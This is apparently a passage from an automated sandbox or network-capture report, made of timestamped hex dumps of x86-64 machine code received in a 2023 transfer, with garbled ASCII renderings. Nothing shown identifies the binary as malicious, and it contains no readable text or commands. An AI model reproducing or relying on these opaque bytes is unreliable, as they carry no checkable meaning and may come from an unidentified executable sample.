00 4c 01 f3 4d 69 f0 67 fb 09 00 4d 01 ce 4d 69 c8 53 c6 f0 ff 4d 01 e9 4d 69 e8 d1 15 02 00 4d
                                                                                                                                                                                                                    Data Ascii: LLiHiMLi,Lt$pHHi-HHigIIiSLLiSHIiMLiLIHiIi-LMi,Ll$8MiLLi,Lt$HO$Li-LiMLigIIi,Ht$@IHiSHiLHIi-LMigMMiSMMiM
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC329INData Raw: 7c ff ff ff 0f 1f 40 00 45 09 ca 48 83 c3 01 49 8d 43 01 46 88 54 1d 00 48 39 f3 74 2b 49 89 c3 31 ff e9 59 ff ff ff 90 48 8b 2d 15 3c ab 00 ff d5 48 83 eb 01 c7 00 16 00 00 00 b8 ff ff ff ff e9 78 ff ff ff 0f 1f 00 31 c0 e9 77 ff ff ff 66 0f 1f 84 00 00 00 00 00 48 8b 2d e5 3b ab 00 ff d5 c7 00 22 00 00 00 40 84 ff 74 cf eb c1 ff 15 d0 3b ab 00 c7 00 16 00 00 00 b8 ff ff ff ff e9 42 ff ff ff 0f 1f 40 00 57 56 53 48 83 ec 20 48 89 cf 48 89 d6 4c 89 c3 48 85 d2 74 3b 4d 85 c0 74 36 4c 89 c2 45 31 c0 48 d1 ea e8 48 39 57 00 48 8b 57 08 48 8b 0f 49 89 d9 49 89 f0 e8 96 fe ff ff 85 c0 0f 94 c0 48 83 c4 20 5b 5e 5f c3 66 0f 1f 84 00 00 00 00 00 31 c0 48 83 c4 20 5b 5e 5f c3 66 0f 1f 44 00 00 48 83 ec 28 4d 85 c0 74 17 4d 85 c9 74 12 e8 5d fe ff ff 85 c0 0f 94
                                                                                                                                                                                                                    Data Ascii: |@EHICFTH9t+I1YH-<Hx1wfH-;"@t;B@WVSH HHLHt;Mt6LE1HH9WHWHIIH [^_f1H [^_fDH(MtMt]
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC345INData Raw: b9 01 00 00 00 49 89 c4 e8 0b 52 5a 00 49 89 44 24 08 b9 38 00 00 00 48 89 c6 e8 59 73 3e 00 66 48 0f 6e ce 48 c7 44 24 20 00 00 00 00 48 8d 78 20 49 89 44 24 10 48 89 c3 66 48 0f 6e c7 48 c7 40 30 00 00 00 00 66 0f 6c c1 c6 40 18 01 0f 11 00 66 0f ef c0 0f 11 40 20 66 49 0f 6e c4 4d 8b a5 98 04 00 00 48 c7 40 10 01 00 00 00 66 0f 6c c0 48 b8 00 00 00 00 00 00 04 00 4c 89 e1 0f 11 44 24 60 48 89 44 24 28 e8 b3 73 3e 00 b9 18 00 01 00 48 89 c6 48 b8 00 00 00 00 00 00 05 04 49 09 c4 e8 d1 72 3e 00 48 89 c2 48 85 c0 0f 84 7c 01 00 00 f3 0f 6f 05 6d c3 5c 00 48 89 78 10 48 89 03 48 8d 40 18 0f 11 02 48 0f ba e8 32 4c 8d 74 24 50 48 ba ff ff ff ff ff ff 00 00 48 89 44 24 28 48 21 d0 48 8b 15 4c c3 5c 00 4c 89 f1 4c 89 60 08 4c 8d 4c 24 20 4c 8d 05 7b c2 5c 00
                                                                                                                                                                                                                    Data Ascii: IRZID$8HYs>fHnHD$ Hx ID$HfHnH@0fl@f@ fInMH@flHLD$`HD$(s>HHIr>HH|om\HxHH@H2Lt$PHHD$(H!HL\LL`LL$ L{\
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC361INData Raw: 8d 8c 24 40 01 00 00 e8 ac b2 4c 00 4c 89 e1 e8 74 41 3d 00 eb a9 48 89 c3 eb cd 48 89 c3 eb b6 48 89 c3 48 8b 44 24 68 48 8b 4c 24 60 4c 8d ac 24 20 01 00 00 48 83 c0 10 48 89 84 24 00 02 00 00 e8 22 47 59 00 eb a0 e9 72 ff ff ff e9 6d ff ff ff e9 68 ff ff ff e9 63 ff ff ff e9 5e ff ff ff eb b8 eb bb 48 8b 4c 24 58 48 89 c3 e8 66 31 57 00 48 8b 84 24 b8 00 00 00 48 8b bc 24 c0 00 00 00 48 8b 40 e8 48 89 bc 04 80 01 00 00 48 8b 84 24 a8 00 00 00 48 8b bc 24 b0 00 00 00 48 89 84 24 90 01 00 00 48 8b 40 e8 48 89 bc 04 90 01 00 00 48 8b 84 24 98 00 00 00 48 8b bc 24 a0 00 00 00 48 89 84 24 80 01 00 00 48 8b 40 e8 48 89 bc 04 80 01 00 00 48 c7 84 24 88 01 00 00 00 00 00 00 e9 3c ff ff ff 48 89 c3 48 8b 47 e8 48 89 bc 24 80 01 00 00 48 89 b4 04 80 01 00 00 48
                                                                                                                                                                                                                    Data Ascii: $@LLtA=HHHHD$hHL$`L$ HH$"GYrmhc^HL$XHf1WH$H$H@HH$H$H$H@HH$H$H$H@HH$<HHGH$HH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC377INData Raw: e8 8b f3 3d 00 8b 9c 24 50 01 00 00 48 89 c1 48 8b 84 24 58 01 00 00 48 89 44 24 58 e9 2b e0 ff ff 4c 8b 44 24 60 48 8b 54 24 68 e8 60 f3 3d 00 8b 9c 24 50 01 00 00 48 89 c1 48 8b 84 24 58 01 00 00 48 89 44 24 58 e9 39 e1 ff ff 4c 8b 44 24 60 48 8b 54 24 68 e8 35 f3 3d 00 8b 9c 24 50 01 00 00 48 89 c1 48 8b 84 24 58 01 00 00 48 89 44 24 58 e9 fc ed ff ff 4c 8b 44 24 60 48 8b 54 24 68 e8 0a f3 3d 00 8b 9c 24 50 01 00 00 48 89 c1 48 8b 84 24 58 01 00 00 48 89 44 24 58 e9 c3 e3 ff ff 4c 8b 44 24 60 48 8b 54 24 68 e8 df f2 3d 00 8b 9c 24 50 01 00 00 48 89 c1 48 8b 84 24 58 01 00 00 48 89 44 24 58 e9 0c e2 ff ff 48 89 c1 4c 29 d9 48 01 d1 4c 39 c1 0f 87 88 e6 ff ff 48 89 4b 08 48 8b 4c 24 70 e9 a3 e6 ff ff c7 44 24 58 10 00 00 00 bb 00 02 00 00 49 8b 47 10 48
                                                                                                                                                                                                                    Data Ascii: =$PHH$XHD$X+LD$`HT$h`=$PHH$XHD$X9LD$`HT$h5=$PHH$XHD$XLD$`HT$h=$PHH$XHD$XLD$`HT$h=$PHH$XHD$XHL)HL9HKHL$pD$XIGH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC393INData Raw: 24 38 48 89 42 08 48 8b 54 24 48 e9 61 f4 ff ff b9 01 00 00 00 4c 89 5c 24 58 48 89 54 24 48 4c 89 54 24 40 48 89 44 24 50 e8 ea 91 59 00 48 8b 54 24 28 4c 8b 5c 24 58 4c 8b 4c 24 50 4c 8b 54 24 40 48 89 42 08 48 8b 54 24 38 48 89 42 08 48 8b 54 24 48 e9 89 f3 ff ff 48 8b 54 24 28 48 8b 02 49 39 c1 49 0f 43 c1 48 83 7a 08 00 48 89 44 24 48 0f 84 e0 03 00 00 48 8b 4c 24 48 48 83 c1 18 0f 84 50 03 00 00 e8 ec b2 3d 00 48 89 c2 48 89 c1 48 85 c0 0f 84 7b e6 ff ff 48 8b 4c 24 48 48 89 68 10 48 89 d5 48 c7 40 08 00 00 00 00 48 89 08 48 8b 44 24 40 48 89 10 48 8b 44 24 38 31 d2 e9 44 f1 ff ff 48 8b 54 24 28 b8 00 02 00 00 4c 8b 2a 49 39 c5 4c 0f 42 e8 48 83 7a 08 00 0f 84 57 03 00 00 4c 89 e9 48 83 c1 18 0f 84 43 03 00 00 e8 81 b2 3d 00 48 85 c0 0f 84 35 03 00
                                                                                                                                                                                                                    Data Ascii: $8HBHT$HaL\$XHT$HLT$@HD$PYHT$(L\$XLL$PLT$@HBHT$8HBHT$HHT$(HI9ICHzHD$HHL$HHP=HHH{HL$HHhHH@HHD$@HHD$81DHT$(L*I9LBHzWLHC=H5
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC409INData Raw: 31 c0 c7 46 18 09 00 00 00 e9 82 cc ff ff 49 89 f8 48 89 da 48 89 f1 e8 2c 14 00 00 85 c0 0f 84 14 cf ff ff 83 f8 15 0f 85 aa fc ff ff 48 8d 05 bd c8 5b 00 c7 46 18 15 00 00 00 41 bc 15 00 00 00 48 89 46 20 b8 02 00 00 00 e9 41 cc ff ff 48 8d 05 4d cb 5b 00 c7 46 18 15 00 00 00 41 bc 15 00 00 00 48 89 46 20 b8 0a 00 00 00 e9 1f cc ff ff 48 8b 56 08 b8 31 00 00 00 e9 49 cc ff ff 48 8d 05 62 cd 5b 00 c7 06 00 00 00 00 41 bc 17 00 00 00 48 89 46 20 31 c0 c7 46 18 17 00 00 00 e9 ec cb ff ff 48 8d 05 b0 c9 5b 00 c7 46 18 07 00 00 00 41 bc 07 00 00 00 48 89 46 20 31 c0 e9 cd cb ff ff c7 06 00 00 00 00 c6 46 48 02 e9 3e d8 ff ff c7 06 00 00 00 00 31 c0 e9 71 cc ff ff c7 06 00 00 00 00 b8 23 00 00 00 e9 61 cc ff ff c7 06 00 00 00 00 b8 15 00 00 00 e9 51 cc ff ff
                                                                                                                                                                                                                    Data Ascii: 1FIHH,H[FAHF AHM[FAHF HV1IHb[AHF 1FH[FAHF 1FH>1q#aQ
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC425INData Raw: 89 44 24 30 0f 84 60 04 00 00 4c 8b 54 24 30 48 89 54 24 50 31 c9 4c 89 5c 24 48 4c 89 4c 24 40 49 83 c2 18 0f 84 eb f4 ff ff 4c 89 d1 4c 89 44 24 38 e8 41 33 3d 00 4c 8b 44 24 38 48 85 c0 48 89 c1 0f 84 cd f4 ff ff 4c 8b 54 24 30 4c 8b 4c 24 40 48 c7 40 08 00 00 00 00 b9 18 00 00 00 48 8b 54 24 28 4c 89 10 4c 8b 54 24 48 4c 89 48 10 49 89 c1 48 89 02 48 8b 54 24 50 e9 85 f4 ff ff 48 8b 45 00 48 39 c1 48 0f 43 c1 48 83 7d 08 00 48 89 44 24 38 0f 84 6d 03 00 00 48 8b 4c 24 38 4c 89 44 24 58 48 83 c1 18 0f 84 52 03 00 00 44 89 54 24 50 48 89 54 24 48 4c 89 4c 24 40 e8 b5 32 3d 00 4c 8b 4c 24 40 48 8b 54 24 48 48 85 c0 44 8b 54 24 50 48 89 c1 0f 84 d9 f1 ff ff 48 8b 4c 24 38 4c 8b 44 24 58 48 c7 40 08 00 00 00 00 4c 8b 5c 24 28 48 89 08 48 8b 4c 24 30 4c 89
                                                                                                                                                                                                                    Data Ascii: D$0`LT$0HT$P1L\$HLL$@ILLD$8A3=LD$8HHLT$0LL$@H@HT$(LLT$HLHIHHT$PHEH9HCH}HD$8mHL$8LD$XHRDT$PHT$HLL$@2=LL$@HT$HHDT$PHHL$8LD$XH@L\$(HHL$0L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC441INData Raw: ff ff 00 00 4c 23 7e 08 48 01 fb 85 d2 74 3a 66 0f 1f 84 00 00 00 00 00 4c 89 fa 48 89 e9 45 89 f1 4d 89 e0 e8 af 7e 4a 00 49 8d 57 10 48 8d 4d 10 45 89 f1 4d 89 e0 48 83 c5 20 49 83 c7 20 e8 94 7e 4a 00 48 39 eb 75 cf 48 b8 00 00 00 00 00 00 ff ff 49 23 45 08 66 45 0f d6 45 00 48 09 f8 49 89 45 08 e9 f5 fd ff ff 0f 1f 80 00 00 00 00 66 81 fa 05 04 75 0b 80 7c 24 67 00 0f 84 3e 03 00 00 80 e6 10 0f 85 1d 02 00 00 8b 1e 48 8d 05 e4 cf 6e 00 49 bf ff ff ff ff ff ff 00 00 4c 23 7e 08 4c 0f 44 f8 83 fb 0d 0f 87 0d 02 00 00 b8 0d 00 00 00 41 b8 05 1c 00 00 29 d8 66 45 89 45 0e 41 88 45 0d 49 89 d8 4c 89 fa e8 c0 f2 3c 00 c6 04 18 00 e9 85 fd ff ff 0f 1f 80 00 00 00 00 45 89 f1 4d 89 e0 48 89 f2 e8 0a fa ff ff e9 6c fe ff ff 0f 1f 44 00 00 bb 03 00 00 00 66 41
                                                                                                                                                                                                                    Data Ascii: L#~Ht:fLHEM~JIWHMEMH I ~JH9uHI#EfEEHIEfu|$g>HnIL#~LDA)fEEAEIL<EMHlDfA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC457INData Raw: 40 49 8d 41 50 49 8b 59 10 48 39 c1 74 0a e8 b5 91 58 00 4c 8b 4c 24 28 49 8b 49 20 49 8d 41 30 48 39 c1 0f 84 7f 00 00 00 4c 89 4c 24 28 e8 95 91 58 00 48 8b 4c 24 28 e8 8b 91 58 00 48 85 db 74 73 49 89 d9 eb a3 4c 89 e9 e8 79 91 58 00 48 85 db 0f 85 3a 01 00 00 49 8b 4c 24 40 49 8d 44 24 50 49 8b 5c 24 10 48 39 c1 74 05 e8 57 91 58 00 49 8b 4c 24 20 49 8d 44 24 30 48 39 c1 0f 84 16 01 00 00 e8 3f 91 58 00 4c 89 e1 e8 37 91 58 00 48 85 db 0f 84 11 01 00 00 49 89 dc e9 13 ff ff ff 66 0f 1f 44 00 00 4c 89 c9 e8 18 91 58 00 48 85 db 75 8d 49 8b 4f 40 49 8d 47 50 49 8b 5f 10 48 39 c1 74 05 e8 fd 90 58 00 49 8b 4f 20 49 8d 47 30 48 39 c1 74 20 e8 eb 90 58 00 4c 89 f9 e8 e3 90 58 00 48 85 db 74 1b 49 89 df e9 eb fe ff ff 66 0f 1f 44 00 00 4c 89 f9 e8 c8 90 58
                                                                                                                                                                                                                    Data Ascii: @IAPIYH9tXLL$(II IA0H9LL$(XHL$(XHtsILyXH:IL$@ID$PI\$H9tWXIL$ ID$0H9?XL7XHIfDLXHuIO@IGPI_H9tXIO IG0H9t XLXHtIfDLX
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC473INData Raw: 4c 89 e9 48 89 da ff 50 10 48 8b 8b 00 01 00 00 66 0f ef c0 0f 11 83 f8 00 00 00 48 85 c9 74 1d f0 83 69 0c 01 75 16 48 8b 01 4c 8d 05 57 60 53 00 48 8b 50 18 4c 39 c2 75 6e ff 50 08 31 c0 48 83 c4 20 5b 41 5c 41 5d c3 0f 1f 80 00 00 00 00 f0 83 2a 01 75 e7 45 31 ed 49 8b 04 24 48 8d 15 c4 39 53 00 48 8b 40 10 48 39 d0 75 2b f0 41 83 6c 24 0c 01 75 81 49 8b 04 24 48 8d 0d 07 60 53 00 48 8b 50 18 48 39 ca 4c 89 e1 75 1f ff 50 08 e9 62 ff ff ff 0f 1f 00 4c 89 e1 ff d0 eb ce 66 0f 1f 84 00 00 00 00 00 ff d2 eb 91 ff d2 e9 44 ff ff ff 90 0f 1f 40 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 48 89 8c 24 80 00 00 00 48 85 c9 0f 84 79 03 00 00 48 8b 84 24 80 00 00 00 48 8b 70 18 48 85 f6 0f 84 fb 02 00 00 48 8b 7e 18 48 85 ff 0f 84 a4 02 00 00 48 8b 6f 18
                                                                                                                                                                                                                    Data Ascii: LHPHfHtiuHLW`SHPL9unP1H [A\A]*uE1I$H9SH@H9u+Al$uI$H`SHPH9LuPbLfD@AWAVAUATUWVSH8H$HyH$HpHH~HHo
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC489INData Raw: ed ff ff 0f 1f 44 00 00 f3 0f 6f 60 10 0f 11 a4 24 e0 00 00 00 e9 87 f2 ff ff 66 0f 1f 44 00 00 48 89 4c 24 20 45 31 c0 31 d2 4c 89 e9 e8 c6 a0 54 00 48 8d b4 24 e0 00 00 00 48 8d 50 10 48 89 b4 24 d0 00 00 00 48 8b 08 48 89 b4 24 98 00 00 00 48 39 d1 0f 85 33 f2 ff ff f3 0f 6f 68 10 0f 11 ac 24 e0 00 00 00 e9 35 f2 ff ff 0f 1f 40 00 48 89 d0 e9 7f fb ff ff 8d 50 05 4c 8d a4 24 10 01 00 00 48 8d 84 24 20 01 00 00 45 31 c0 4c 89 e1 48 89 44 24 50 48 89 84 24 10 01 00 00 e8 b5 a3 54 00 4c 8b 8c 24 10 01 00 00 48 83 bc 24 60 03 00 00 63 0f 86 12 fd ff ff 8b 84 24 18 01 00 00 44 8d 40 ff e9 80 f4 ff ff 66 0f 1f 44 00 00 8d 50 06 e9 37 f4 ff ff 48 8b 7b 28 48 8b 53 20 48 83 ff 09 0f 86 1c 01 00 00 41 b8 0a 00 00 00 4c 89 e1 e8 90 32 3c 00 85 c0 75 2b 41 bd 0a
                                                                                                                                                                                                                    Data Ascii: Do`$fDHL$ E11LTH$HPH$HH$H93oh$5@HPL$H$ E1LHD$PH$TL$H$`c$D@fDP7H{(HS HAL2<u+A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC505INData Raw: cb 48 8b 89 38 07 00 00 89 d6 48 85 c9 74 09 e8 64 5a 2e 00 85 c0 74 10 31 c0 48 83 c4 28 5b 5e c3 0f 1f 80 00 00 00 00 40 84 f6 48 8d 05 26 f0 ff ff 48 8d 15 7f de ff ff 48 8b 8b 38 07 00 00 48 0f 44 d0 e8 2f 57 2e 00 b8 01 00 00 00 48 83 c4 28 5b 5e c3 90 66 90 53 48 83 ec 20 48 89 cb 48 8b 09 48 85 c9 74 05 e8 5b d1 57 00 48 8b 4b 08 48 c7 03 00 00 00 00 48 85 c9 74 0d e8 c6 15 0e 00 48 c7 43 08 00 00 00 00 48 8b 4b 20 48 85 c9 74 0d e8 c0 20 0e 00 48 c7 43 20 00 00 00 00 66 0f ef c0 c6 83 28 02 00 00 01 48 8b 83 48 02 00 00 48 c7 83 40 02 00 00 00 00 00 00 0f 11 43 10 0f 11 83 30 02 00 00 48 3b 83 50 02 00 00 74 07 48 89 83 50 02 00 00 48 8b 83 60 02 00 00 48 3b 83 68 02 00 00 74 07 48 89 83 68 02 00 00 48 83 c4 20 5b c3 90 66 90 41 56 41 55 41 54 55
                                                                                                                                                                                                                    Data Ascii: H8HtdZ.t1H([^@H&HH8HD/W.H([^fSH HHHt[WHKHHtHCHK Ht HC f(HHH@C0H;PtHPH`H;htHhH [fAVAUATU
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC521INData Raw: d0 4c 8b 50 10 4c 8b 58 18 4c 3b 48 20 76 e7 4d 85 db 74 0c 4c 89 d8 eb cf 0f 1f 80 00 00 00 00 4c 39 c1 74 53 4c 3b 49 20 72 4d 4c 8d 1d ae 2e 76 00 eb 12 0f 1f 40 00 49 89 d3 4d 85 d2 74 19 4c 89 d0 48 89 c2 4c 8b 52 10 48 8b 42 18 4c 3b 4a 20 76 e4 48 85 c0 75 ea 4d 39 c3 74 2a 4d 3b 4b 20 72 24 49 8b 4b 28 48 85 c9 74 0b 4d 89 e0 4c 89 ea e8 40 fb ff ff 4c 89 e1 48 83 c4 28 41 5c 41 5d e9 e0 c2 fb ff 48 8d 0d 12 3d 5a 00 e8 f4 e2 57 00 90 90 66 90 41 57 41 56 41 55 41 54 55 57 56 53 48 81 ec 58 03 00 00 0f 11 b4 24 40 03 00 00 66 0f ef c0 49 89 cc b9 18 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 84 24 b8 00 00 00 00 04 00 00 c7 84 24 c0 00 00 00 00 00 00 00 48 c7 84 24 c8 00 00 00 00 00 00 00 0f 11 44 24 78 0f 11 84 24 88 00 00 00 0f 11 84 24 98 00 00
                                                                                                                                                                                                                    Data Ascii: LPLXL;H vMtLL9tSL;I rML.v@IMtLHLRHBL;J vHuM9t*M;K r$IK(HtML@LH(A\A]H=ZWfAWAVAUATUWVSHX$@fIHD$pH$$H$D$x$$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC537INData Raw: 8b 42 18 4c 39 c1 48 0f 4f 42 10 41 0f 9f c1 48 85 c0 75 e4 48 89 d7 45 84 c9 75 75 49 39 c8 0f 8f 43 ff ff ff 48 89 d7 4c 89 d1 e8 98 51 57 00 e9 b3 fa ff ff 31 c9 4c 3b 47 20 0f 9c c1 e9 85 fa ff ff 48 8b 8b c8 02 00 00 48 85 c9 75 0c e9 ee 00 00 00 0f 1f 40 00 48 89 c1 4c 8b 49 20 48 8b 41 18 4d 39 c8 48 0f 4c 41 10 41 0f 9c c3 48 85 c0 75 e4 48 89 cf 45 84 db 0f 85 c5 00 00 00 4d 39 c8 0f 8f df fe ff ff 48 89 cf eb 9a 4c 89 e2 48 89 d7 48 39 93 d0 02 00 00 0f 84 d0 fe ff ff 48 89 d1 4c 89 54 24 68 4c 89 44 24 60 48 89 54 24 58 e8 20 c8 56 00 48 8b 7c 24 58 4c 8b 54 24 68 48 8b 48 20 4c 8b 44 24 60 48 89 c2 e9 49 ff ff ff 49 89 d0 49 29 e8 49 01 c0 49 39 c8 0f 87 b1 f7 ff ff 4d 89 43 08 48 8b 4c 24 40 4c 8b 44 24 78 e9 cf f7 ff ff 48 8b 93 c8 02 00 00
                                                                                                                                                                                                                    Data Ascii: BL9HOBAHuHEuuI9CHLQW1L;G HHu@HLI HAM9HLAAHuHEM9HLHH9HLT$hLD$`HT$X VH|$XLT$hHH LD$`HIII)II9MCHL$@LD$xH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC553INData Raw: 66 0f d7 d0 66 83 f2 ff 74 c6 0f b7 d2 f3 0f bc d2 48 63 d2 48 01 d0 e9 38 fd ff ff 0f 1f 40 00 49 63 54 24 30 49 3b 54 24 38 0f 8e ec fd ff ff 83 f8 11 0f 87 d3 03 00 00 48 8d 15 64 d0 59 00 48 63 04 82 48 01 d0 ff e0 0f 1f 80 00 00 00 00 4c 8d ac 24 a0 00 00 00 49 c7 c0 ff ff ff ff 48 8d 15 5d cc 59 00 4c 89 e9 e8 8a 73 f8 ff 49 89 c6 48 85 c0 7e 12 49 8b 44 24 40 4c 29 f0 48 83 f8 01 0f 85 a9 fd ff ff 48 8d 15 08 d0 59 00 4c 89 e9 e8 01 6d f8 ff 44 8b 8c 24 a0 00 00 00 48 89 44 24 28 48 ba 00 00 00 00 00 00 05 04 48 8d 05 e8 cf 59 00 48 bb ff ff ff ff ff ff 00 00 48 09 d0 48 23 9c 24 a8 00 00 00 48 8b 15 6f d0 59 00 49 c1 e1 05 48 89 44 24 58 4a 8d 34 0b 48 89 54 24 50 48 39 de 0f 84 ec 02 00 00 48 89 c1 48 89 c2 41 bf 0d 00 00 00 48 bf ff ff ff ff ff
                                                                                                                                                                                                                    Data Ascii: fftHcH8@IcT$0I;T$8HdYHcHL$IH]YLsIH~ID$@L)HHYLmD$HD$(HHYHHH#$HoYIHD$XJ4HT$PH9HHAH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC569INData Raw: 66 0f 2f 35 68 97 59 00 72 6e 41 b8 08 00 00 00 4c 89 ea e8 70 ca ff ff 49 89 d9 49 89 f0 48 8d 0d cb 94 59 00 48 89 c2 e8 0b 8b f8 ff 90 0f 10 74 24 70 48 81 c4 88 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 90 48 89 f9 ff d0 e9 26 fe ff ff 66 0f 1f 44 00 00 48 89 f9 ff d0 48 89 c1 e9 cf fd ff ff 0f 1f 00 66 0f ef c0 e9 db fe ff ff 0f 1f 80 00 00 00 00 66 0f ef c0 eb 8c 66 2e 0f 1f 84 00 00 00 00 00 66 0f ef c0 e9 20 ff ff ff 0f 1f 80 00 00 00 00 ff d0 e9 c3 fc ff ff 66 0f 1f 84 00 00 00 00 00 48 89 f9 ff d0 48 89 c1 e9 30 ff ff ff 0f 1f 00 48 89 f9 ff d0 48 89 c1 e9 bb fe ff ff 0f 1f 00 48 89 f9 ff d0 48 89 c1 e9 3e fe ff ff 90 66 90 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 28 48 89 4c 24 70 48 85 c9 0f 84 55 01 00 00 48 8b 44 24 70 48 8b 70 18
                                                                                                                                                                                                                    Data Ascii: f/5hYrnALpIIHYHt$pH[^_]A\A]A^A_H&fDHHfff.f fHH0HHHH>fAWAVAUATUWVSH(HL$pHUHD$pHp
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC585INData Raw: 89 5c 24 50 e8 0f 92 56 00 48 8b 54 24 28 4c 8b 54 24 60 4c 8b 4c 24 58 4c 8b 5c 24 50 48 89 42 08 48 8b 54 24 40 48 89 42 08 e9 5d f0 ff ff b9 01 00 00 00 4c 89 4c 24 60 4c 89 5c 24 58 4c 89 54 24 50 e8 d0 91 56 00 48 8b 54 24 28 4c 8b 4c 24 60 4c 8b 5c 24 58 4c 8b 54 24 50 48 89 42 08 48 8b 54 24 40 48 89 42 08 e9 a9 f0 ff ff b9 01 00 00 00 4c 89 54 24 50 4c 89 4c 24 48 4c 89 44 24 40 e8 91 91 56 00 48 8b 54 24 28 4c 8b 4c 24 48 4c 8b 54 24 50 4c 8b 44 24 40 48 89 42 08 49 89 41 08 e9 f0 f7 ff ff b9 01 00 00 00 4c 89 4c 24 50 4c 89 44 24 48 4c 89 54 24 40 e8 57 91 56 00 48 8b 54 24 28 4c 8b 4c 24 50 4c 8b 44 24 48 4c 8b 54 24 40 48 89 42 08 49 89 41 08 e9 66 fc ff ff b9 01 00 00 00 4c 89 54 24 50 4c 89 4c 24 48 4c 89 44 24 40 e8 1d 91 56 00 48 8b 54 24
                                                                                                                                                                                                                    Data Ascii: \$PVHT$(LT$`LL$XL\$PHBHT$@HB]LL$`L\$XLT$PVHT$(LL$`L\$XLT$PHBHT$@HBLT$PLL$HLD$@VHT$(LL$HLT$PLD$@HBIALL$PLD$HLT$@WVHT$(LL$PLD$HLT$@HBIAfLT$PLL$HLD$@VHT$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC601INData Raw: 00 14 61 0f 87 67 02 00 00 c7 84 24 d0 00 00 00 00 00 11 41 48 89 c2 49 89 f1 eb 0f 0f 1f 40 00 4d 85 c0 74 23 4c 89 c1 48 89 c8 81 78 20 ff ff 10 41 48 8b 48 10 4c 8b 40 18 76 e4 48 85 c9 74 0a 49 89 c1 eb e2 66 90 4c 89 c8 48 39 c6 74 09 81 78 20 00 00 11 41 76 4f 48 8d 7b 40 48 8b 43 48 49 89 f9 48 85 c0 75 1e e9 f7 0a 00 00 66 2e 0f 1f 84 00 00 00 00 00 4d 85 c0 0f 84 cf 0a 00 00 4c 89 c1 48 89 c8 81 78 20 ff ff 10 41 48 8b 48 10 4c 8b 40 18 76 e0 48 85 c9 0f 84 b2 0a 00 00 49 89 c1 eb de 66 90 48 8b 05 49 2e 6c 00 31 ed c7 84 24 a0 00 00 00 00 00 00 41 4c 8b 38 48 89 d0 49 89 f1 0f 1f 00 81 7a 20 ff ff ff 40 4c 8b 42 10 48 8b 4a 18 77 0f 48 85 c9 74 1a 48 89 ca eb e5 0f 1f 44 00 00 4d 85 c0 74 0e 49 89 d1 4c 89 c2 eb d3 0f 1f 00 4c 89 ca 48 39 d6 0f
                                                                                                                                                                                                                    Data Ascii: ag$AHI@Mt#LHx AHHL@vHtIfLH9tx AvOH{@HCHIHuf.MLHx AHHL@vHIfHI.l1$AL8HIz @LBHJwHtHDMtILLH9
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC617INData Raw: 56 00 48 8d 14 3b 0f 11 76 10 31 ff 4c 8d 74 24 20 48 89 56 20 eb 24 90 f3 0f 6f 4c 24 20 48 83 c3 10 48 83 c7 01 0f 11 4b f0 48 89 5e 18 48 39 fd 74 2f 48 8b 5e 18 48 8b 56 20 48 c7 44 24 20 ff ff ff ff 44 89 64 24 28 48 39 da 75 ca 4d 89 f0 4c 89 e9 e8 2f 21 52 00 48 83 c7 01 48 39 fd 75 d1 0f 10 74 24 30 48 83 c4 40 5b 5e 5f 5d 41 5c 41 5d 41 5e c3 48 8d 0d 70 d8 58 00 e8 b6 62 56 00 48 8b 4e 10 49 89 c4 48 85 c9 74 05 e8 35 11 56 00 4c 89 e1 e8 ed 40 39 00 90 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 55 41 54 55 57 56 53 48 83 ec 38 66 0f ef c0 0f 11 41 10 48 89 ce 49 89 d5 4c 8d 61 10 48 c7 41 20 00 00 00 00 0f b7 42 0e c7 01 00 00 00 00 48 c7 41 08 ff ff ff ff 66 83 f8 04 74 1a 66 83 f8 03 0f 84 7e 00 00 00 48 83 c4 38 5b 5e 5f 5d 41 5c 41 5d c3 0f 1f
                                                                                                                                                                                                                    Data Ascii: VH;v1Lt$ HV $oL$ HHKH^H9t/H^HV HD$ Dd$(H9uML/!RHH9ut$0H@[^_]A\A]A^HpXbVHNIHt5VL@9ff.AUATUWVSH8fAHILaHA BHAftf~H8[^_]A\A]
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC633INData Raw: d3 66 0f 56 ca f2 0f 58 cb f2 44 0f 2c f1 45 85 f6 44 0f 4e f0 85 db 0f 4e d8 66 0f 1f 44 00 00 44 39 f3 44 89 f0 49 89 f9 0f 4e c3 49 89 e8 4c 89 e1 48 98 48 89 44 24 20 48 8b 16 e8 07 e4 ff ff 44 29 f3 85 db 7e 10 48 83 c6 08 49 39 f7 75 cf 0f 1f 80 00 00 00 00 f3 0f 6f 84 24 80 00 00 00 0f 12 e8 66 49 0f 7e c6 66 48 0f 7e e8 49 39 c6 0f 84 91 01 00 00 8b 44 24 70 48 8b 4c 24 50 41 0f 11 45 10 48 c7 84 24 80 00 00 00 00 00 00 00 41 89 45 00 48 8b 44 24 78 49 89 45 08 48 8b 84 24 90 00 00 00 49 89 45 20 48 85 c9 74 06 e8 14 d1 55 00 90 0f 10 b4 24 a0 00 00 00 4c 89 e8 48 81 c4 b8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 4c 89 fa 48 89 c1 e8 b5 f2 39 00 4c 89 f9 e8 dd d0 55 00 e9 a0 fd ff ff 0f 1f 84 00 00 00 00 00 8b 84 24 18 01 00 00
